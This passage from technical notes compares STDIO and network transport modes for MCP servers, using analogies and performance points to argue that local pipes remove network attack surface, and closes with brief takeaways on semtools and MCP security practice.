ss -tulpn | grep mcp
# No network listeners from MCP server
```
### Real-World Analogy
#### Network Mode = Public Payphone
```
Your Network MCP Server ≈ Public payphone on busy street
Characteristics:
❌ Anyone can walk up and use it
❌ No authentication required to access
❌ Accessible 24/7 from public area
❌ Can be discovered by scanning the area
❌ Vulnerable to physical tampering
❌ Conversations can be overheard
❌ Location is publicly known
```
#### STDIO Mode = Private Intercom System
```
Your STDIO MCP Server ≈ Private intercom between two secured rooms
Characteristics:
✅ Only connected rooms can communicate
✅ No external access possible
✅ Cannot be discovered from outside
✅ Automatic disconnection when rooms close
✅ Private, encrypted communication channel
✅ No public presence or discoverability
✅ Dies when building is vacated
```
### Performance Comparison
#### STDIO Mode Performance Benefits
```bash
# Communication path:
Application → System Call → Kernel → Pipes → Target Process
# Advantages:
✅ No network stack overhead
✅ No TCP/IP processing
✅ No network serialization/deserialization
✅ Direct memory-to-memory communication
✅ Kernel-optimized pipe performance
✅ No network latency or jitter
```
#### Network Mode Performance Overhead
```bash
# Communication path:
Application → System Call → Kernel → Network Stack →
Network Interface → Physical Network → ... → Target Process
# Disadvantages:
❌ Full network stack processing required
❌ TCP/IP overhead (headers, checksums, etc.)
❌ Network serialization overhead
❌ Potential network latency and jitter
❌ Additional memory copies through network buffers
❌ Network interface driver overhead
```
### Key Architectural Principle
**The fundamental security principle is**:
> **"If communication doesn't need to cross machine boundaries, don't use protocols designed for that purpose."**
This means:
- Use **IPC mechanisms** (pipes, domain sockets) for local communication
- Use **network protocols** only when actually communicating across networks
- **Default to the most restrictive communication mechanism** that meets your needs
- **Network exposure should be explicit and intentional**, never accidental
### Why "Local IPC Suffices" for MCP
MCP (Model Context Protocol) communication typically involves:
1. **Same-machine processes**: Claude Code and MCP server run on same computer
2. **Parent-child relationship**: Claude Code spawns and manages MCP server
3. **Request-response pattern**: Simple command/response communication
4. **No remote access needed**: No legitimate need for network accessibility
5. **Process lifecycle coupling**: MCP server should die when Claude Code exits
All of these requirements are perfectly served by **local IPC** (specifically STDIO pipes), while **network protocols** add zero value but create massive security risk.
### The Bottom Line
**STDIO mode eliminates network attack surface entirely by operating below the OSI network layers.** Instead of using protocols designed for internet communication, it uses OS-level process communication that cannot be accessed remotely.
This is why the security guidance consistently recommends STDIO mode: **it's not just "more secure" - it makes entire categories of attacks physically impossible.**
## Key Takeaways
### Semtools
- Powerful combination of AI-powered document parsing and semantic search
- Requires proper API configuration but provides excellent text extraction
- Semantic search finds contextually relevant content beyond keyword matching
- Outputs are well-structured and preserve document formatting
### MCP Security
- Terminal access should be avoided or heavily restricted
- Multiple layers of security are essential
- Stdio mode is safer than network mode
- Always apply principle of least privilege
- Structured APIs are preferable to raw command execution
## Resources
- **LlamaParse API**: https://api.cloud.llamaindex.ai
- **Semtools**: Installed via `cargo install semtools`
- **MCP Documentation**: Model Context Protocol specifications
- **Security Best Practices**: Container isolation, permission controls, audit logging
---
*Document created: 2025-09-06*
*Tools tested: semtools v1.2.1, Rust 1.89.0*